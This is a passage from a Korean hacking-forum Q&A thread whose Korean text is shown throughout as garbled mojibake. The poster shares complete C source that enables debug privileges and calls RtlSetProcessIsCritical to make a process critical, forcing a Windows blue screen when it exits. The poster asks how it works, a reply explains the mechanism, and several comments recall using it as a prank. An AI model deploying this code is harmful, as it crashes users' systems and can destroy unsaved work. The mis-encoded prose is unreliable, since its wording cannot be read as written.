ÇÁ·Î±×·¡¹Ö

 3206, 8/161 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   h@cking2013
   ºí·ç½ºÅ©¸° ¼Ò½º

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_programming&no=6450 [º¹»ç]


¾È³çÇϼ¼¿ä.
ÀÎÅͳݿ¡¼­ ºí·ç½ºÅ©¸°À» ¶ç¿ì´Â ¼Ò½º¸¦ ¿ì¿¬È÷ ¹ß°ßÇÏ¿´½À´Ï´Ù.

#include <windows.h>

typedef VOID ( _stdcall *RtlSetProcessIsCritical ) (
               IN BOOLEAN        NewValue,
               OUT PBOOLEAN OldValue,
               IN BOOLEAN      IsWinlogon );

BOOL EnablePriv(LPCSTR lpszPriv)
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkprivs;
    ZeroMemory(&tkprivs, sizeof(tkprivs));

    if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))
        return FALSE;

    if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){
        CloseHandle(hToken); return FALSE;
    }

    tkprivs.PrivilegeCount = 1;
    tkprivs.Privileges[0].Luid = luid;
    tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
    CloseHandle(hToken);
    return bRet;
}

BOOL ProtectProcess()
{
   HANDLE hDLL;
   RtlSetProcessIsCritical fSetCritical;

   hDLL = LoadLibraryA("ntdll.dll");
   if ( hDLL != NULL )
   {
         EnablePriv(SE_DEBUG_NAME);
        (fSetCritical) = (RtlSetProcessIsCritical) GetProcAddress( (HINSTANCE)hDLL, "RtlSetProcessIsCritical" );
          if(!fSetCritical) return 0;
          fSetCritical(1,0,0);
    return 1;
   } else
          return 0;
}

int main (void)
{
ProtectProcess();
return 1;
}

¾î¶² ¿ø¸®Àΰ¡¿ä?
  Hit : 6635     Date : 2014/03/23 03:12


    
MainThread hDLLÀ̶ó´Â DLLÆÄÀÏÀ» ÅëÇØ RtlSetProcessIsCriticalÇÔ¼ö¸¦ ¾ò¾î¿À°í ÀÖ½À´Ï´Ù.
- RtlSetProcessIsCritical´Â ÀÓ°èÇÁ·Î¼¼½º¸¦ »ý¼ºÇϱâ À§ÇÑ ÇÔ¼öÀÔ´Ï´Ù.
- ÀÓ°èÇÁ·Î¼¼½º(Critical Process)´Â Á¾·áµÇÁö ¾Ê´Â Áï, ºí·ç½ºÅ©¸°À» À¯¹ß½ÃÅ°´Â ÇÁ·Î¼¼½ºÀÔ´Ï´Ù.

GetProcAddress¿¡ ´ëÇØ ÀÚ¼¼È÷ ¾Ë°í ½ÍÀ¸½Ã´Ù¸é MSDNÀ» Âü°íÇØ º¸¼¼¿ä
From MainThread		 2014/05/24  
h@cking2013 °¨»çÇÕ´Ï´Ù! 2014/07/30  
±èº´±Ç ¿¾³¯¿¡ ¾î¶² ºÐÀÌ ³×ÀÌÆ®¿ÂÀ¸·Î ºí·ç½ºÅ©¸° È­¸é¿¡ ¶ç¿öºÁ¶ó°í ÇÏ´øµ¥...
±â¾ïÀÌ ³ª³×¿ä. ÁÁÀº Á¤º¸ °¨»çÇØ¿ä... ¤»¤»		 2015/02/01  
±èº´±Ç 6³âÀº µÈ °Å¶óµµ ±â¾ïÀÌ ³ª±ä ³³´Ï´Ù ¤»¤»¤»¤» 2015/02/01  
somass °¨»çÇÕ´Ï´Ù 2022/09/16  
3066   C++ Áú¹®ÀÌ ÀÖ½À´Ï´Ù.[1]     shdac
 03/31 2914
3065   C¾ð¾î ¹®Á¦Ç®ÀÌÁß ±Ã±ÝÇÑ°Ô »ý°å´Âµ¥¿ä[1]     È£¹Ú
 03/30 3361
  ºí·ç½ºÅ©¸° ¼Ò½º[5]     h@cking2013
 03/23 6634
3063   ¡ß ¾ÆÀ̺ñ¾¾ºª.½ºº¸ºª ½´ÆÛ-½Ã´Ï¾î ¸¶½ºÅÍ Á÷¿µÁ¡ ¡ß     popo123
 03/14 3642
3062   [Æ÷ÀÎÅÍ]C¾ð¾î Áú¹®[2]     ¹Ú¿µ¹Î
 03/12 3427
3061   0xffffffff°¡ ¹«½¼ ¶æÀΰ¡¿ä??[1]     socks
 03/02 6329
3060   À©µµ¿ìÁî¿¡¼­ ¹é±×¶ó¿îµå·Î ÇÁ·Î±×·¥½ÇÇàÇÏ°Ô Çϴ°Ϳ¡ ´ëÇØ      yuhioh8
 02/25 4437
3059   connection timed out[4]     h@cking2013
 02/25 2923
3058   ¼ÒÄÏ ÇÁ·Î±×·¡¹Ö ¿¡·¯!![2]     h@cking2013
 02/24 5014
3057   ƯÁ¤ÇÑ Å°ÀÇ °ªÀ» ÀÔ·Â ¹ÞÀ»¶§ ƯÁ¤ÇÑ ÀÛµ¿À»ÇÏ´Â ÇÁ·Î±×·¥À» ±¸»óÁßÀä[3]     yuhioh8
 02/18 3251
3056   ÀÌ°Å ¿Ö °æ°í°¡ ¶ß´ÂÁö¾Ë¼öÀÖÀ»±î¿ä? c¾ð¾î·Î ¸¸µé¾ú½À´Ï´Ù[2]     Opportunity
 02/16 3928
3055   c¾ð¾î ¹æ±Ý ¸· ¹è¿ì±â ½ÃÀÛÇߴµ¥¿ä ..scanf ÇÔ¼ö¿¡´ëÇؼ­ Áú¹®ÀÌ¿ä[4]     Opportunity
 02/15 3048
3054   c¾ð¾î ´ÙÂ÷¿ø ¹è¿­ ±Ã±ÝÇÑ °Å[3]     ktf1234
 02/13 2841
3053   JSP Áú¹® µå¸³´Ï´Ù.[1]     sonyy789
 02/12 3712
3052   C¾ð¾î Ãâ·Â ¼­½ÄÀ» ÀÌ¿ëÇÑ ÀÚ¸´¼ö ÁöÁ¤ÀÌ ¹»±î¿ä..[2]     ktf1234
 02/06 3892
3051   ¹¹°¡ À߸øµÈ°É±î¿ä ¤Ð¤Ð[4]     yous4831
 02/06 3456
3050   c¾ð¾î »ó¼öÀǹøÁöÇ¥Çö ´äº¯Á»¿ä ¤Ð¤Ð[3]     ktf1234
 02/05 2829
3049   °£´ÜÇÑ C¾ð¾î ¿¹Á¦Àε¥ ±Ã±ÝÇÑ°Ô ÀÖ¾î¿ä![3]     besunshine90
 02/05 3484
3048   c¾ð¾î °ü·ÃÇؼ­ Áú¹®Á» ÇÏ°Ú½À´Ï´Ù.[1]     dudtntdud
 01/28 2822
3047   c Áú¹®ÀÌ¿ä[6]     raldbstn8
 01/24 3349
[1][2][3][4][5][6][7] 8 [9][10]..[161]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org